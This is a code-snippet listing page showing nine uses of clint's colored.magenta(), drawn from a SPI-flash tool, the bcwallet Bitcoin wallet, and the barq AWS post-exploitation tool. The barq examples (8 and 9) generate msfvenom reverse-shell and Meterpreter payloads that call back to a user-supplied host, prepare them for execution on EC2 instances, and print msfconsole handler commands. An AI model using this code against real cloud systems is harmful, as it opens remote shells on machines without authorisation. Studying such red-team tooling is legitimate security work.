Python clint.textui.colored.magenta() Examples
The following are 9
code examples of clint.textui.colored.magenta().
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Example #1
Source File: From spi-flash-programmer with Creative Commons Zero v1.0 Universal | 5 votes |
def logDebug(text, type): if type == DEBUG_NORMAL: puts(colored.cyan(text)) else: # DEBUG_VERBOSE puts(colored.magenta(text))
Example #2
Source File: From bcwallet with Apache License 2.0 | 5 votes |
def print_bcwallet_basic_pub_opening(mpub): puts("You've opened your HD wallet in PRIVATE key mode, so you CAN sign transactions.") puts("If you like, you can always open your HD wallet in PUBLIC key mode like this:\n") with indent(2): puts(colored.magenta('$ bcwallet --wallet=%s\n' % mpub))
Example #3
Source File: From bcwallet with Apache License 2.0 | 5 votes |
def print_bcwallet_basic_priv_opening(priv_to_display): with indent(4): puts(colored.magenta('$ bcwallet --wallet=%s\n' % priv_to_display))
Example #4
Source File: From bcwallet with Apache License 2.0 | 5 votes |
def print_bcwallet_piped_priv_opening(priv_to_display): with indent(4): puts(colored.magenta('$ echo %s | bcwallet\n' % priv_to_display))
Example #5
Source File: From bcwallet with Apache License 2.0 | 5 votes |
def print_bcwallet_piped_priv_cat_opening(): with indent(4): puts(colored.magenta('$ cat wallet_seed.txt | bcwallet\n'))
Example #6
Source File: From barq with MIT License | 5 votes |
def get_security_groups(caller): """ List security groups discovered. :param caller: calling menu to return to. :return: None """ global secgroups try: puts(color( '[*] Your collected security groups, if you want an updated list, invoke attacksurface:')) for group in secgroups['groups']: puts("Group ID: %s" % group.get('id', ''))) puts("Group description: %s" % group.get('description', ''))) puts('Group Ingress IP permissions:')) for p in group['ip_permissions']: ranges = '' for iprange in p.get('ranges', []): ranges = ranges + '%s,' % iprange['CidrIp'] if len(ranges) > 1 and ranges[-1] == ',': ranges = ranges[:-1] puts('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' % ( p.get('fromport', 'Any'), p.get('toport', 'Any'), p.get('protocol', 'All'), ranges))) puts('Group Egress IP permissions:')) for p in group['ip_permissions_egress']: ranges = '' for iprange in p.get('ranges', []): ranges = ranges + '%s,' % iprange['CidrIp'] if len(ranges) > 1 and ranges[-1] == ',': ranges = ranges[:-1] puts('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' % ( p.get('fromport', 'Any'), p.get('toport', 'Any'), p.get('protocol', 'All'), ranges))) puts(colored.magenta('=======================================')) except Exception as e: print(e) puts(color( '[!] You have no stored security groups. Run the command attacksurface to discover them')) go_to_menu(caller)
Example #7
Source File: From barq with MIT License | 5 votes |
def check_command_invocations(caller): """ Check stored results of previously executed attacks on EC2 instances. :param caller: calling menu :return: None """ global command_invocations if len(command_invocations['commands']) < 1: puts(color( '[!] You don\'t have any commands run yet against EC2 targets. Run ec2attacks to launch commands.')) go_to_menu(caller) for command in command_invocations['commands']: puts('command id: %s' % command.get('id'))) puts('command instance id: %s' % command.get('instanceid'))) puts('command state: %s' % command.get('state'))) puts('command platform: %s' % command.get('platform'))) puts('command region: %s' % command.get('region'))) try: puts('command error: %s' % command.get('error', 'No errors')[0:5000])) except: pass try: puts('command output: %s' % command.get('output', 'No output')[0:5000])) except: pass puts(colored.magenta('======================================='))
Example #8
Source File: From barq with MIT License | 4 votes |
def metasploit_installed_multiple_options(linux, windows): """ Prompts for metasploit options against a range of EC2 instances depending on their OS. :param linux: Whether or not there are any targeted instances running Linux. :param windows: Whether or not there are any targeted instances running Windows. :return: Tuple of metasploit payloads for linux and windows. """ puts(color( '[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.')) linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp' linux_https_meterpreterx64 = 'python/meterpreter/reverse_https' linux_tcp_shell = 'python/shell_reverse_tcp' windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp' windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https' windows_tcp_shell = 'windows/x64/shell/reverse_tcp' linuxattack = '' windowsattack = '' #remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:') #remote_port = prompt.query("Your remote port number:", default="4444") if linux: linux_options = [{'selector': '1', 'prompt': 'Linux Meterpreter reverse TCP x64', 'return': linux_tcp_meterpreterx64}, {'selector': '2', 'prompt': 'Linux Meterpreter reverse HTTPS x64', 'return': linux_https_meterpreterx64}, {'selector': '3', 'prompt': 'Linux TCP Shell', 'return': linux_tcp_shell}] linuxpayload = prompt.options( 'Payload for Linux EC2 instances:', linux_options) host = prompt.query('Your remote IP or hostname to connect back to:') port = prompt.query( "Your remote port number (Listener ports should be different for linux and windows):", default="4444") linuxmsfshell = 'msfvenom -a python --platform python -p %s LHOST=%s LPORT=%s -f raw --smallest' % ( linuxpayload, host, port) puts(color( '[*] Run the following command on your remote listening server to run the linux payload handler:')) msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" % ( host, port, linuxpayload) puts(colored.magenta(msfconsole_cmd)) linuxattack = os.popen(linuxmsfshell).read() linuxattack = "python -c \"%s\"" % linuxattack if windows: windows_options = [{'selector': '1', 'prompt': 'Windows Meterpreter reverse TCP x64', 'return': windows_tcp_meterpreterx64}, {'selector': '2', 'prompt': 'Windows Meterpreter reverse HTTPS x64', 'return': windows_https_meterpreterx64}, {'selector': '3', 'prompt': 'Windows TCP Shell', 'return': windows_tcp_shell}] windowspayload = prompt.options( 'Payload for Windows EC2 instances:', windows_options) host = prompt.query('Your remote IP or hostname to connect back to:') port = prompt.query( "Your remote port number (Listener ports should be different for linux and windows):", default="5555") windowsmsfshell = 'msfvenom -a x64 --platform Windows -p %s LHOST=%s LPORT=%s --f psh-net --smallest' % ( windowspayload, host, port) puts(color( '[*] Run the following command on your remote listening server to run the windows payload handler:')) msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" % ( host, port, windowspayload) puts(colored.magenta(msfconsole_cmd)) windowsattack = os.popen(windowsmsfshell).read() return linuxattack, windowsattack
Example #9
Source File: From barq with MIT License | 4 votes |
def metasploit_installed_options(host, port, OS): """ Prompts for metasploit options against an EC2 instance depending on its OS. :param host: IP or hostname of the listening server running metasploit exploit handler. :param port: The port the exploit handler is listening on. :param OS: The OS of the target instance :return: Tuple of reverse shell payloads for linux and windows. """ puts(color( '[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.')) # output = os.popen("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh --smallest").read()` linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp' linux_https_meterpreterx64 = 'python/meterpreter/reverse_https' linux_tcp_shell = 'python/shell_reverse_tcp' windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp' windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https' windows_tcp_shell = 'windows/x64/shell/reverse_tcp' if OS == 'linux': action = 'AWS-RunShellScript' shell_options = [{'selector': '1', 'prompt': 'Linux Meterpreter reverse TCP x64', 'return': linux_tcp_meterpreterx64}, {'selector': '2', 'prompt': 'Linux Meterpreter reverse HTTPS x64', 'return': linux_https_meterpreterx64}, {'selector': '3', 'prompt': 'Linux TCP Shell', 'return': linux_tcp_shell}] else: action = 'AWS-RunPowerShellScript' shell_options = [{'selector': '1', 'prompt': 'Windows Meterpreter reverse TCP x64', 'return': windows_tcp_meterpreterx64}, {'selector': '2', 'prompt': 'Windows Meterpreter reverse HTTPS x64', 'return': windows_https_meterpreterx64}, {'selector': '3', 'prompt': 'Windows TCP Shell', 'return': windows_tcp_shell}] payload = prompt.options('Payload:', shell_options) if OS == 'linux': msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f raw --smallest' % ( payload, host, port) else: msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s --f psh-net --smallest' % ( payload, host, port) puts(color( '[*] Run the following command on your reverse server running the handler:')) msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" % ( host, port, payload) puts(colored.magenta(msfconsole_cmd)) shellcode = os.popen(msfshell).read() if OS == 'linux': shellcode = "python -c \"%s\"" % shellcode return shellcode, action